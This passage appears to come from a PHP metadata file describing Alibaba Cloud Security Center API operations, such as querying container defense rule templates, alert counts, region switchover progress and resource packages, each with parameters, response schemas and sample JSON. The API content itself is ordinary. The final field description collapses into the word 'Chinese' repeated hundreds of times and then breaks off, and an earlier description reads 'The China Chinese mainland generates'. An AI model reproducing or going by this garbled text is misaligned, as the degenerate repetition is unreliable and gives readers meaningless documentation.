**true**: Successful.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed information about the error code.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '1E36BEEA-0B27-58CC-8319-50279203B048', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query rule template details for container proactive defense', 'summary' => 'Queries the details of a rule template for container proactive defense.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetStrategyTemplateDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetStrategyTemplateDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"StrategyId\\": 1005,\\n \\"StrategyTemplateId\\": 1204,\\n \\"ClusterId\\": \\"c8ca91e0907d94efaba7fb0827eb9****\\",\\n \\"StrategyName\\": \\"Blank template\\",\\n \\"Description\\": \\"Custom defense configuration\\",\\n \\"ClusterName\\": \\"hhht-cluster-02\\",\\n \\"UnScanedImage\\": false,\\n \\"MaliciousImage\\": false,\\n \\"Namespace\\": [\\n \\"default\\"\\n ],\\n \\"ImageName\\": [\\n \\"test\\"\\n ],\\n \\"Label\\": [\\n \\"test\\"\\n ],\\n \\"RuleAction\\": 1,\\n \\"WhiteList\\": [\\n \\"test-tag\\"\\n ],\\n \\"AlarmDetail\\": {\\n \\"Baseline\\": {\\n \\"RiskLevel\\": [\\n \\"low\\"\\n ],\\n \\"Item\\": [\\n {\\n \\"Id\\": \\"ak_leak\\",\\n \\"Name\\": \\"Access Key plaintext storage\\"\\n }\\n ]\\n },\\n \\"Vul\\": {\\n \\"RiskLevel\\": [\\n \\"low\\"\\n ],\\n \\"Item\\": [\\n {\\n \\"Id\\": \\"AVD-2023-1680169\\",\\n \\"Name\\": \\"ezOffice evoInterfaceServlet Info Leak\\"\\n }\\n ]\\n },\\n \\"MaliciousFile\\": {\\n \\"RiskLevel\\": [\\n \\"low\\"\\n ],\\n \\"Item\\": [\\n {\\n \\"Id\\": \\"test\\",\\n \\"Name\\": \\"test\\"\\n }\\n ]\\n }\\n }\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"1E36BEEA-0B27-58CC-8319-50279203B048\\"\\n}","type":"json"}]', ], 'GetSupportedModules' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'ListCheckResultResponse', 'type' => 'object', 'properties' => [ 'SupportedModuleResponse' => [ 'description' => 'The module information supported by the current vendors, categorized by vendor.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Vendor' => ['description' => 'The cloud asset vendor. Valid values:'."\n" ."\n" .'- **Tencent**: Tencent Cloud'."\n" .'- **HUAWEICLOUD**: Huawei Cloud'."\n" .'- **Azure**: Azure'."\n" .'- **AWS**: AWS.', 'type' => 'string', 'example' => 'Tencent', 'title' => ''], 'SupportedModules' => [ 'description' => 'The list of modules supported by the current vendor.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Module' => ['description' => 'The module code. Valid values:'."\n" .'- **HOST**: Host'."\n" .'- **CSPM**: Cloud product configuration check'."\n" .'- **SIEM**: CloudSiem'."\n" .'- **TRIAL**: Log audit.', 'type' => 'string', 'example' => 'HOST', 'title' => ''], 'ModuleDisp' => ['description' => 'The display name of the module.', 'type' => 'string', 'example' => '云产品配置检查', 'title' => ''], 'ModuleAuth' => ['description' => 'The module authorization status. Valid values:'."\n" .'- **true**: Enabled.'."\n" .'- **false**: Disabled.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'C699E4E4-F2F4-58FC-A949-457FFE59****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Retrieve module information supported by multi-cloud vendors', 'summary' => 'Retrieves the list of modules supported for authorization.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetSupportedModules'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:GetSupportedModules', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"SupportedModuleResponse\\": [\\n {\\n \\"Vendor\\": \\"Tencent\\",\\n \\"SupportedModules\\": [\\n {\\n \\"Module\\": \\"HOST\\",\\n \\"ModuleDisp\\": \\"云产品配置检查\\",\\n \\"ModuleAuth\\": true\\n }\\n ]\\n }\\n ],\\n \\"RequestId\\": \\"C699E4E4-F2F4-58FC-A949-457FFE59****\\"\\n}","type":"json"}]', ], 'GetSuspiciousStatistics' => [ 'summary' => 'Queries the statistics on the number of security alerts in one or more asset groups.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92314', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '10.12.XX.XX', 'title' => ''], ], [ 'name' => 'GroupIdList', 'in' => 'query', 'schema' => ['description' => 'The IDs of the asset groups that you want to query. Separate multiple asset group IDs with commas (,).'."\n" .'> You can call the [DescribeAllGroups](~~DescribeAllGroups~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '9997897', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'SuspiciousCount' => ['description' => 'The number of security alerts whose alert level is Suspicious.', 'type' => 'integer', 'format' => 'int32', 'example' => '8', 'title' => ''], 'RemindCount' => ['description' => 'The number of security alerts whose alert level is Reminder.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '84092B42-1A59-4F34-8DF8-1D93520990A5', 'title' => ''], 'SeriousCount' => ['description' => 'The number of security alerts whose alert level is Urgent.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'TotalCount' => ['description' => 'The total number of security alerts.', 'type' => 'integer', 'format' => 'int32', 'example' => '9', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query security alert counts by asset group', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetSuspiciousStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetSuspiciousStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"SuspiciousCount\\": 8,\\n \\"RemindCount\\": 0,\\n \\"RequestId\\": \\"84092B42-1A59-4F34-8DF8-1D93520990A5\\",\\n \\"SeriousCount\\": 1,\\n \\"TotalCount\\": 9\\n}","type":"json"}]', ], 'GetSwitchRegionDetail' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '162834', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The service switchover type. Valid values:'."\n" ."\n" .'- **sg_switch**: The server connection is migrated from China to Singapore.'."\n" .'- **sls_meta_version_switch_stage_1**: The log analysis delivery field upgrade switchover.', 'type' => 'string', 'required' => false, 'example' => 'sg_switch', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The response data.', 'type' => 'object', 'properties' => [ 'IsAgree' => ['description' => 'Indicates whether the migration is agreed to.', 'type' => 'string', 'example' => 'true', 'title' => ''], 'GmtIsAgreeModified' => ['description' => 'The time when the authorization operation was modified.', 'type' => 'integer', 'format' => 'int64', 'example' => '1692858597000', 'title' => ''], 'IsNoticed' => ['description' => 'Indicates whether the notification has been sent.', 'type' => 'string', 'example' => 'YES', 'title' => ''], 'GmtNoticed' => ['description' => 'The notification time.', 'type' => 'integer', 'format' => 'int64', 'example' => '1692858597000', 'title' => ''], 'RegionStatus' => [ 'description' => 'The switchover status of the region.', 'type' => 'array', 'items' => [ 'description' => 'The data.', 'type' => 'object', 'properties' => [ 'EcsCount' => ['description' => 'The number of ECS instances.', 'type' => 'integer', 'format' => 'int32', 'example' => '27', 'title' => ''], 'RegionId' => ['description' => 'The region where the server resides.', 'type' => 'string', 'example' => 'us-east-1', 'title' => ''], 'Status' => ['description' => 'The migration status. Valid values:'."\n" .'- **0**: waiting for migration'."\n" .'- **1**: switchover succeeded.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'GmtPlanSwitchTime' => ['description' => 'The planned migration time.', 'type' => 'integer', 'format' => 'int64', 'example' => '1692858597000', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'NeedSwitch' => ['description' => 'Indicates whether a switchover to the new console is required.'."\n" ."\n" .'- **true**: A switchover to the new console is required.'."\n" ."\n" .'- **false**: The legacy console is still in use.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'NeedNotice' => ['description' => 'Indicates whether a pop-up notification needs to be displayed to the user.'."\n" ."\n" .'- **true**: A pop-up notification needs to be displayed.'."\n" ."\n" .'- **false**: No pop-up notification needs to be displayed.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of the request. The China Chinese mainland generates a unique identifier for each request, which can be used for troubleshooting and diagnostics.', 'type' => 'string', 'example' => '30CBF632-109F-596F-97F2-451C8B2A****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query service switchover progress', 'summary' => 'Queries the progress of a service switchover. For example, when a server connection is being migrated from China to Singapore, this operation retrieves the migration progress and status.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetSwitchRegionDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetSwitchRegionDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"IsAgree\\": \\"true\\",\\n \\"GmtIsAgreeModified\\": 1692858597000,\\n \\"IsNoticed\\": \\"YES\\",\\n \\"GmtNoticed\\": 1692858597000,\\n \\"RegionStatus\\": [\\n {\\n \\"EcsCount\\": 27,\\n \\"RegionId\\": \\"us-east-1\\",\\n \\"Status\\": 0,\\n \\"GmtPlanSwitchTime\\": 1692858597000\\n }\\n ],\\n \\"NeedSwitch\\": true,\\n \\"NeedNotice\\": false\\n },\\n \\"RequestId\\": \\"30CBF632-109F-596F-97F2-451C8B2A****\\"\\n}","type":"json"}]', ], 'GetTenantCheckAvailable' => [ 'summary' => 'Queries whether a free one-click scan can be submitted. The scan scope includes free vulnerability scanning categories and free CSPM check items.', 'methods' => ['get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '236190', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '69BFFCDE-37D6-5A49-A8BC-BB03AC83****'], 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The current status of the one-click scan. Valid values:'."\n" ."\n" .'- 0: The one-click scan can be submitted.'."\n" ."\n" .'- 1: The current task is not complete. The scan cannot be submitted.'."\n" ."\n" .'- 2: The free scan quota for this week has been used. Wait until the next free scan time.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'NextScanTime' => ['description' => 'The timestamp of the next time when a one-click scan can be submitted.', 'type' => 'integer', 'format' => 'int64', 'example' => '1725530005357', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Query whether a one-click scan can be submitted', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetTenantCheckAvailable'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetTenantCheckAvailable', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"69BFFCDE-37D6-5A49-A8BC-BB03AC83****\\",\\n \\"Data\\": {\\n \\"Status\\": 0,\\n \\"NextScanTime\\": 1725530005357\\n }\\n}","type":"json"}]', ], 'GetUnknownThreatDetectStatistic' => [ 'summary' => 'Retrieves statistics information on intelligent behavior analytics.', 'path' => '', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasXNUPZF'], 'autoTest' => true, 'tenantRelevance' => 'publicInformation', ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'Id of the request', 'type' => 'string', 'example' => 'FD394AF6-591E-5168-8C8C-4C7847******'], 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'MonitorMachineCount' => ['description' => 'The number of servers in warning status.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'BlockMachineCount' => ['description' => 'The number of servers under control.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'StudyingMachineCount' => ['description' => 'The number of servers in learning status.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'OpenMachineCount' => ['description' => 'The number of servers with the service enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'MachineCount' => ['description' => 'The total number of servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'BlockEventMachineCount' => ['type' => 'integer', 'format' => 'int32', 'description' => '', 'title' => '', 'example' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Retrieve intelligent behavior analytics statistics information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetUnknownThreatDetectStatistic', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"FD394AF6-591E-5168-8C8C-4C7847******\\",\\n \\"Data\\": {\\n \\"MonitorMachineCount\\": 1,\\n \\"BlockMachineCount\\": 1,\\n \\"StudyingMachineCount\\": 1,\\n \\"OpenMachineCount\\": 1,\\n \\"MachineCount\\": 1,\\n \\"BlockEventMachineCount\\": 0\\n }\\n}","type":"json"}]', ], 'GetUserLang' => [ 'summary' => 'Queries the log analysis language settings.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], ], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response data.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '23AD0BD2-8771-5647-819E-6BA51E21****', 'title' => ''], 'SasUserLang' => [ 'description' => 'The language settings data.', 'type' => 'object', 'properties' => [ 'Lang' => ['description' => 'The language configured for log analysis. Valid values:'."\n" ."\n" .'- zh: Chinese'."\n" .'- en: English.', 'type' => 'string', 'example' => 'zh', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query log analysis language settings', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetUserLang', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"23AD0BD2-8771-5647-819E-6BA51E21****\\",\\n \\"SasUserLang\\": {\\n \\"Lang\\": \\"zh\\"\\n }\\n}","type":"json"}]', ], 'GetValidDeductInstances' => [ 'summary' => 'Get Valid Resource Package Instances', 'path' => '', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], ], 'parameters' => [ [ 'name' => 'Modules', 'in' => 'query', 'schema' => ['description' => 'Resource package name code, values:'."\n" ."\n" .'- Vulnerability resource package: **sas_vul_dp_cn**'."\n" .'- CSPM resource package: **sas_cspm_dp_cn**'."\n" .'- Anti-virus resource package: **sas_viruspackage_dp_cn**', 'type' => 'string', 'required' => false, 'example' => 'sas_vul_dp_cn', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'Resource package status, default is valid (valid), not modifiable.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => 'Available', 'title' => ''], ], [ 'name' => 'InstanceId', 'in' => 'query', 'schema' => ['description' => 'Resource package instance ID, can be queried through [QueryResourcePackageInstances]().', 'type' => 'string', 'required' => false, 'example' => 'sas_cspm_dp_cn-***80001', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of this call request, a unique identifier generated by Alibaba Cloud for the request, which can be used to troubleshoot and locate issues.', 'type' => 'string', 'example' => '6D56A5C4-9C78-5EB1-9246-60B7FAECA1D5'], 'Data' => [ 'description' => 'Returned data.', 'type' => 'object', 'properties' => [ 'CanTry' => ['description' => 'Whether eligible for trial. Values:'."\n" .'- **true**: Eligible'."\n" .'- **false**: Not eligible', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'DeductPackageList' => [ 'description' => 'List of resource package usage details.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Module' => ['description' => 'Module code. Values:'."\n" .'- **POST_HOST**: Host and container protection'."\n" .'- **CSPM**: Cloud product configuration check'."\n" .'- **VUL**: Vulnerability scan', 'type' => 'string', 'example' => 'POST_HOST', 'title' => ''], 'InstanceId' => ['description' => 'Resource package instance ID.', 'type' => 'string', 'example' => 'sas_**_dp_cn-2***', 'title' => ''], 'StartTime' => ['description' => 'Start timestamp (milliseconds).', 'type' => 'integer', 'format' => 'int64', 'example' => '1737734400000', 'title' => ''], 'EndTime' => ['description' => 'End time.', 'type' => 'integer', 'format' => 'int64', 'example' => '1737734400000', 'title' => ''], 'Status' => ['description' => 'Resource package status. Values:'."\n" .'- **valid**: Valid'."\n" .'- **invalid**: Invalid', 'type' => 'string', 'example' => 'Available', 'title' => ''], 'InitCapacity' => ['description' => 'Total amount of the resource package.', 'type' => 'number', 'format' => 'double', 'example' => '1000', 'title' => ''], 'PeriodCapacity' => ['description' => 'Authorized consumption up to the previous billing cycle.', 'type' => 'number', 'format' => 'double', 'example' => '100', 'title' => ''], 'CurrentPeriodUsed' => ['description' => 'Authorized consumption in the current billing cycle.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"6D56A5C4-9C78-5EB1-9246-60B7FAECA1D5\\",\\n \\"Data\\": {\\n \\"CanTry\\": true,\\n \\"DeductPackageList\\": [\\n {\\n \\"Module\\": \\"POST_HOST\\",\\n \\"InstanceId\\": \\"sas_**_dp_cn-2***\\",\\n \\"StartTime\\": 1737734400000,\\n \\"EndTime\\": 1737734400000,\\n \\"Status\\": \\"Available\\",\\n \\"InitCapacity\\": 1000,\\n \\"PeriodCapacity\\": 100,\\n \\"CurrentPeriodUsed\\": 10\\n }\\n ]\\n }\\n}","type":"json"}]', 'title' => 'Get Valid Resource Package Instances', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:GetValidDeductInstances', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetVirusScanConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '168831', 'abilityTreeNodes' => ['FEATUREsasE5WAEJ'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'TaskType', 'in' => 'query', 'schema' => ['description' => 'The task type. Valid values:'."\n" .'- **VIRUS\\_VUL\\_SCHEDULE\\_SCAN**: virus scan.', 'type' => 'string', 'required' => false, 'example' => 'VIRUS_VUL_SCHEDULE_SCAN', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. China Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese 